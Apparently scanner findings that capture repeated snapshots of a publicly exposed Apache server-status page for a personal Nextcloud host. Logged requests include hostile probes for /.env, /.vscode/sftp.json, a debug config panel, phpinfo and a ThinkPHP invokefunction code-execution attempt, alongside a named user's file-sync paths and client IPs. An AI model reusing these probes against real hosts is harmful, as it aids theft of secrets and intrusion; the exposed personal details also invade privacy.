8.73122558600.00.3318.01 213.32.122.81http/1.1localhost:80GET / HTTP/1.1 1-8318220260/61/1492_ 8.821972124800.00.3214.01 147.182.130.98http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-8318220260/51/1569_ 8.75012308220.00.3411.79 185.32.134.177http/1.1localhost:80GET / HTTP/1.1 1-8318220260/68/1631_ 8.840542612410.00.4515.05 147.182.130.98http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-8318220260/54/1614_ 8.831572350550.00.3417.47 147.182.130.98http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-8318220261/63/1575W 8.76002342780.00.3722.03 147.182.130.98http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-8318220260/49/1548_ 8.67124802456480.00.2811.41 161.97.163.11http/1.1localhost:80POST /frontend/web/debug/default/view HTTP/1.1 1-8318220260/61/1589_ 8.840542350260.00.3816.72 147.182.130.98http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-8318220260/60/1581_ 8.620542374900.00.3415.39 161.97.163.11http/1.1 1-8318220260/66/1555_ 8.693562369420.00.4613.63 161.97.163.11http/1.1ravignon.mycloud.paris:443POST /%C0 HTTP/1.1 1-8318220260/63/1608_ 8.713762486740.00.4719.50 147.182.130.98http/1.1 1-8318220260/74/1643_ 8.774921202424640.00.5218.53 128.14.141.34http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-8318220260/62/1541_ 8.69492962554390.00.3921.77 161.97.163.11http/1.1ravignon.mycloud.paris:443POST /tool/view/phpinfo.view.php HTTP/1.1 1-8318220260/64/1603_ 8.60302756370.00.3632.17 147.182.130.98h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-8318220260/52/1546_ 8.7831062246890.00.2817.94 147.182.130.98http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-8318220260/58/1525_ 8.60302391060.00.3415.64 147.182.130.98h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-8318220260/48/1546_ 8.722582325010.00.5918.46 147.182.130.98h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-8318220260/53/1585_ 8.732672411200.00.3624.36 147.182.130.98http/1.1 1-8318220260/74/1572_ 8.831602272780.00.4614.06 147.182.130.98http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-8318220260/51/1484_ 8.66212311320.00.3319.78 147.182.130.98http/1.1 1-8318220260/63/1561_ 8.703642481210.00.8718.61 147.182.130.98h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-67-0/0/1406
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb532106cc
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Saturday, 06-May-2023 21:26:28 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 64 Parent Server MPM Generation: 63 Server uptime: 56 days 15 hours 9 minutes 51 seconds Server load: 0.00 0.00 0.00 Total accesses: 89368 - Total Traffic: 1.1 GB - Total Duration: 14176471 CPU Usage: u140.19 s257.07 cu540.5 cs167.79 - .0226% CPU load .0183 requests/sec - 234 B/second - 12.5 kB/request - 158.63 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 21496636no0yes025000 31496637no0yes124000 Sum200 149000 ..................................................______________ ___________________________________W............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-51-0/0/657. 0.008547861751086010.00.0021.31 219.146.152.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-51-0/0/673. 0.008547868541000690.00.007.67 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/678. 0.008547861681103030.00.004.93 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/708. 0.0085478601089000.00.0014.23 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/699. 0.00854786731114960.00.009.76 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/717. 0.008547861531018510.00.009.52 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/730. 0.00854786611068970.00.0012.30 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/677. 0.008547861031003970.00.006.53 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/661. 0.008547861491028440.00.007.86 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/680. 0.00854786128999760.00.0012.38 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/691. 0.008547861691139170.00.005.86 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/683. 0.0085478612071056950.00.005.47 80.66.77.238http/1.1 0-51-0/0/659. 0.0085478601145590.00.0018.67 198.235.24.71http/1.1localhost:80GET / HTTP/1.0 0-51-0/0/674. 0.0085478601069980.00.004.61 192.241.218.40http/1.1localhost:80GET /portal/redlion HTTP/1.1 0-51-0/0/659. 0.0085478657977900.00.006.12 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/683. 0.008547861541191950.00.008.03 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/711. 0.0085478601212490.00.008.29 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/658. 0.008547862945700.00.005.07 80.66.77.238http/1.1localhost:80GET / HTTP/1.1 0-51-0/0/705. 0.00854786601043730.00.005.40 20.25.163.223http/1.1 0-51-0/0/692. 0.00854786831067700.00.008.83 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/694. 0.008547862975760.00.0011.26 20.25.163.223http/1.1localhost:80POST / HTTP/1.1 0-51-0/0/666. 0.008547861351093460.00.005.77 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/706. 0.008547862591028000.00.004.44 92.154.72.252http/1.1ravignon.mycloud.paris:443GET /staticpv/yealink/directory/super_search.xml HTTP/1.1 0-51-0/0/662. 0.008547860962640.00.004.62 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/705. 0.00854786109981740.00.005.27 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-51-0/0/1012. 0.0085478601510030.00.008.15 45.88.66.237http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 1-51-0/0/1015. 0.008547861471574250.00.0016.30 45.88.66.237http/1.1 1-51-0/0/1065. 0.00854786591697330.00.0013.48 107.170.250.16http/1.1localhost:80MGLNDD_109.190.179.92_80\n 1-51-0/0/1011. 0.0085478611667240.00.008.37 179.43.177.243http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1051. 0.0085478621902180.00.0014.11 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/981. 0.0085478601417810.00.007.32 20.25.163.223http/1.1localhost:80GET /.env HTTP/1.1 1-51-0/0/1017. 0.00854786801551610.00.008.29 185.100.87.136http/1.1 1-51-0/0/1076. 0.00854786821886490.00.0011.57 20.25.163.223http/1.1 1-51-0/0/1054. 0.0085478641591550.00.007.54 20.25.163.223http/1.1localhost:80POST / HTTP/1.1 1-51-0/0/999. 0.00854786721547590.00.009.64 185.100.87.136http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/1028. 0.008547861461716250.00.007.88 120.86.33.191http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/1044. 0.008547861471594990.00.008.90 20.25.163.223http/1.1 1-51-0/0/1020. 0.0085478621658720.00.008.32 35.195.131.233http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1039. 0.0085478611683550.00.008.90 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1042. 0.0085478601742140.00.0012.56 185.100.87.136http/1.1 1-51-0/0/1066. 0.008547861351652550.00.0014.73 185.189.182.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/988. 0.0085478611716010.00.0014.70 185.224.128.219http/1.1 1-51-0/0/1051. 0.008547861951997410.00.0019.88 94.232.45.246http/1.1 1-51-0/0/1014. 0.008547861431552780.00.0011.69 146.88.240.16http/1.1 1-51-0/0/995. 0.0085478611614580.00.008.97 35.195.131.233http/1.1 1-51-0/0/1001. 0.0085478611610990.00.0014.78 20.25.163.223http/1.1 1-51-0/0/1033. 0.008547861431663660.00.0018.70 95.165.160.86http/1.1 1-51-0/0/1014. 0.0085478601550880.00.0010.46 80.66.77.238http/1.1 1-51-0/0/975. 0.0085478621626680.00.0013.65 138.197.9.123http/1.1localhost:80GET / HTTP/1.0 1-51-0/0/986. 0.0085478611600490.00.0011.21 80.66.77.238http/1.1localhost:80GET / HTTP/1.1 2-6314966360/0/1230_ 0.00133651782028440.00.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb03864278
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Friday, 05-May-2023 12:50:17 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 63 Parent Server MPM Generation: 62 Server uptime: 55 days 6 hours 33 minutes 40 seconds Server load: 0.00 0.00 0.00 Total accesses: 89135 - Total Traffic: 1.1 GB - Total Duration: 14164949 CPU Usage: u137.01 s251.78 cu539.27 cs167.43 - .0229% CPU load .0187 requests/sec - 239 B/second - 12.5 kB/request - 158.916 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 21479492no0yes718000 31479493no0yes520000 Sum200 1238000 ..................................................W_W_____WW____ _____W___WWRW____________RRR________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-51-0/0/657. 0.007374151751086010.00.0021.31 219.146.152.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-51-0/0/673. 0.007374158541000690.00.007.67 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/678. 0.007374151681103030.00.004.93 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/708. 0.0073741501089000.00.0014.23 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/699. 0.00737415731114960.00.009.76 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/717. 0.007374151531018510.00.009.52 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/730. 0.00737415611068970.00.0012.30 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/677. 0.007374151031003970.00.006.53 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/661. 0.007374151491028440.00.007.86 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/680. 0.00737415128999760.00.0012.38 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/691. 0.007374151691139170.00.005.86 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/683. 0.0073741512071056950.00.005.47 80.66.77.238http/1.1 0-51-0/0/659. 0.0073741501145590.00.0018.67 198.235.24.71http/1.1localhost:80GET / HTTP/1.0 0-51-0/0/674. 0.0073741501069980.00.004.61 192.241.218.40http/1.1localhost:80GET /portal/redlion HTTP/1.1 0-51-0/0/659. 0.0073741557977900.00.006.12 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/683. 0.007374151541191950.00.008.03 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/711. 0.0073741501212490.00.008.29 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/658. 0.007374152945700.00.005.07 80.66.77.238http/1.1localhost:80GET / HTTP/1.1 0-51-0/0/705. 0.00737415601043730.00.005.40 20.25.163.223http/1.1 0-51-0/0/692. 0.00737415831067700.00.008.83 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/694. 0.007374152975760.00.0011.26 20.25.163.223http/1.1localhost:80POST / HTTP/1.1 0-51-0/0/666. 0.007374151351093460.00.005.77 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/706. 0.007374152591028000.00.004.44 92.154.72.252http/1.1ravignon.mycloud.paris:443GET /staticpv/yealink/directory/super_search.xml HTTP/1.1 0-51-0/0/662. 0.007374150962640.00.004.62 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/705. 0.00737415109981740.00.005.27 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-51-0/0/1012. 0.0073741501510030.00.008.15 45.88.66.237http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 1-51-0/0/1015. 0.007374151471574250.00.0016.30 45.88.66.237http/1.1 1-51-0/0/1065. 0.00737415591697330.00.0013.48 107.170.250.16http/1.1localhost:80MGLNDD_109.190.179.92_80\n 1-51-0/0/1011. 0.0073741511667240.00.008.37 179.43.177.243http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1051. 0.0073741521902180.00.0014.11 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/981. 0.0073741501417810.00.007.32 20.25.163.223http/1.1localhost:80GET /.env HTTP/1.1 1-51-0/0/1017. 0.00737415801551610.00.008.29 185.100.87.136http/1.1 1-51-0/0/1076. 0.00737415821886490.00.0011.57 20.25.163.223http/1.1 1-51-0/0/1054. 0.0073741541591550.00.007.54 20.25.163.223http/1.1localhost:80POST / HTTP/1.1 1-51-0/0/999. 0.00737415721547590.00.009.64 185.100.87.136http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/1028. 0.007374151461716250.00.007.88 120.86.33.191http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/1044. 0.007374151471594990.00.008.90 20.25.163.223http/1.1 1-51-0/0/1020. 0.0073741521658720.00.008.32 35.195.131.233http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1039. 0.0073741511683550.00.008.90 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1042. 0.0073741501742140.00.0012.56 185.100.87.136http/1.1 1-51-0/0/1066. 0.007374151351652550.00.0014.73 185.189.182.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/988. 0.0073741511716010.00.0014.70 185.224.128.219http/1.1 1-51-0/0/1051. 0.007374151951997410.00.0019.88 94.232.45.246http/1.1 1-51-0/0/1014. 0.007374151431552780.00.0011.69 146.88.240.16http/1.1 1-51-0/0/995. 0.0073741511614580.00.008.97 35.195.131.233http/1.1 1-51-0/0/1001. 0.0073741511610990.00.0014.78 20.25.163.223http/1.1 1-51-0/0/1033. 0.007374151431663660.00.0018.70 95.165.160.86http/1.1 1-51-0/0/1014. 0.0073741501550880.00.0010.46 80.66.77.238http/1.1 1-51-0/0/975. 0.0073741521626680.00.0013.65 138.197.9.123http/1.1localhost:80GET / HTTP/1.0 1-51-0/0/986. 0.0073741511600490.00.0011.21 80.66.77.238http/1.1localhost:80GET / HTTP/1.1 2-6214794921/4/1229W 0.38002026650.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb0ed4870b
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Wednesday, 03-May-2023 04:36:03 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 61 Parent Server MPM Generation: 60 Server uptime: 52 days 22 hours 19 minutes 25 seconds Server load: 0.00 0.00 0.00 Total accesses: 84213 - Total Traffic: 1.0 GB - Total Duration: 13385696 CPU Usage: u132.91 s243.26 cu513.3 cs159.8 - .0229% CPU load .0184 requests/sec - 240 B/second - 12.8 kB/request - 158.95 ms/request 11 requests currently being processed, 39 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 21451358no0yes520000 31451359no0yes619000 Sum200 1139000 ..................................................__W___________ _______WRWWW_________W_R____WWW_____............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-51-0/0/657. 0.005349601751086010.00.0021.31 219.146.152.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-51-0/0/673. 0.005349608541000690.00.007.67 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/678. 0.005349601681103030.00.004.93 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/708. 0.0053496001089000.00.0014.23 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/699. 0.00534960731114960.00.009.76 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/717. 0.005349601531018510.00.009.52 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/730. 0.00534960611068970.00.0012.30 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/677. 0.005349601031003970.00.006.53 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/661. 0.005349601491028440.00.007.86 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/680. 0.00534960128999760.00.0012.38 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/691. 0.005349601691139170.00.005.86 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/683. 0.0053496012071056950.00.005.47 80.66.77.238http/1.1 0-51-0/0/659. 0.0053496001145590.00.0018.67 198.235.24.71http/1.1localhost:80GET / HTTP/1.0 0-51-0/0/674. 0.0053496001069980.00.004.61 192.241.218.40http/1.1localhost:80GET /portal/redlion HTTP/1.1 0-51-0/0/659. 0.0053496057977900.00.006.12 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/683. 0.005349601541191950.00.008.03 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-51-0/0/711. 0.0053496001212490.00.008.29 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/658. 0.005349602945700.00.005.07 80.66.77.238http/1.1localhost:80GET / HTTP/1.1 0-51-0/0/705. 0.00534960601043730.00.005.40 20.25.163.223http/1.1 0-51-0/0/692. 0.00534960831067700.00.008.83 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-51-0/0/694. 0.005349602975760.00.0011.26 20.25.163.223http/1.1localhost:80POST / HTTP/1.1 0-51-0/0/666. 0.005349601351093460.00.005.77 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-51-0/0/706. 0.005349602591028000.00.004.44 92.154.72.252http/1.1ravignon.mycloud.paris:443GET /staticpv/yealink/directory/super_search.xml HTTP/1.1 0-51-0/0/662. 0.005349600962640.00.004.62 193.32.162.159http/1.1localhost:80GET /dispatch.asp HTTP/1.1 0-51-0/0/705. 0.00534960109981740.00.005.27 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-51-0/0/1012. 0.0053496001510030.00.008.15 45.88.66.237http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 1-51-0/0/1015. 0.005349601471574250.00.0016.30 45.88.66.237http/1.1 1-51-0/0/1065. 0.00534960591697330.00.0013.48 107.170.250.16http/1.1localhost:80MGLNDD_109.190.179.92_80\n 1-51-0/0/1011. 0.0053496011667240.00.008.37 179.43.177.243http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1051. 0.0053496021902180.00.0014.11 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/981. 0.0053496001417810.00.007.32 20.25.163.223http/1.1localhost:80GET /.env HTTP/1.1 1-51-0/0/1017. 0.00534960801551610.00.008.29 185.100.87.136http/1.1 1-51-0/0/1076. 0.00534960821886490.00.0011.57 20.25.163.223http/1.1 1-51-0/0/1054. 0.0053496041591550.00.007.54 20.25.163.223http/1.1localhost:80POST / HTTP/1.1 1-51-0/0/999. 0.00534960721547590.00.009.64 185.100.87.136http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/1028. 0.005349601461716250.00.007.88 120.86.33.191http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/1044. 0.005349601471594990.00.008.90 20.25.163.223http/1.1 1-51-0/0/1020. 0.0053496021658720.00.008.32 35.195.131.233http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1039. 0.0053496011683550.00.008.90 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-51-0/0/1042. 0.0053496001742140.00.0012.56 185.100.87.136http/1.1 1-51-0/0/1066. 0.005349601351652550.00.0014.73 185.189.182.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-51-0/0/988. 0.0053496011716010.00.0014.70 185.224.128.219http/1.1 1-51-0/0/1051. 0.005349601951997410.00.0019.88 94.232.45.246http/1.1 1-51-0/0/1014. 0.005349601431552780.00.0011.69 146.88.240.16http/1.1 1-51-0/0/995. 0.0053496011614580.00.008.97 35.195.131.233http/1.1 1-51-0/0/1001. 0.0053496011610990.00.0014.78 20.25.163.223http/1.1 1-51-0/0/1033. 0.005349601431663660.00.0018.70 95.165.160.86http/1.1 1-51-0/0/1014. 0.0053496001550880.00.0010.46 80.66.77.238http/1.1 1-51-0/0/975. 0.0053496021626680.00.0013.65 138.197.9.123http/1.1localhost:80GET / HTTP/1.0 1-51-0/0/986. 0.0053496011600490.00.0011.21 80.66.77.238http/1.1localhost:80GET / HTTP/1.1 2-6014513580/0/1152_ 0.001102401903950.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb6532bea1
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-01-23T18:34:42 Current Time: Friday, 03-Mar-2023 20:28:34 UTC Restart Time: Friday, 10-Feb-2023 17:57:46 UTC Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 21 days 2 hours 30 minutes 47 seconds Server load: 0.00 0.00 0.00 Total accesses: 27041 - Total Traffic: 267.6 MB - Total Duration: 5781190 CPU Usage: u66.05 s118.54 cu197.66 cs60.02 - .0243% CPU load .0148 requests/sec - 153 B/second - 10.1 kB/request - 213.794 ms/request 11 requests currently being processed, 39 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 2374010no0yes421000 3374063no0yes718000 Sum200 1139000 ..................................................______W_____W_ ___WW____________________W__WWW_WW_W............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-25-0/0/501. 0.0073706831044340.00.006.04 167.94.138.46h2cdone, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-25-0/0/476. 0.00737061461072650.00.002.98 109.206.241.102http/1.1 0-25-0/0/501. 0.0073706691041100.00.003.08 167.248.133.45http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-25-0/0/502. 0.00737061921399290.00.003.13 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/498. 0.0073706187987530.00.002.89 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/502. 0.00737061471018470.00.003.18 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-25-0/0/496. 0.0073706555995120.00.003.37 185.117.37.101http/1.1ravignon.mycloud.paris:443POST /remote.php/dav/bulk HTTP/1.1 0-25-0/0/473. 0.0073706165951660.00.003.18 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-25-0/0/479. 0.0073706154944980.00.006.19 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/497. 0.0073706131872820.00.003.56 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-25-0/0/463. 0.00737061771264040.00.003.61 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-25-0/0/484. 0.0073706254959790.00.003.26 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /index.php?s=/Index/\\think\\app/invokefunction&function=call 0-25-0/0/519. 0.00737061391089670.00.003.34 167.94.138.46http/1.1 0-25-0/0/495. 0.00737062021081710.00.004.40 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/485. 0.00737061391055010.00.004.56 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-25-0/0/476. 0.00737061881040940.00.002.96 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/491. 0.00737062521016500.00.009.93 52.213.200.189http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-25-0/0/468. 0.0073706186934420.00.002.95 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/491. 0.0073706189927370.00.003.25 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/526. 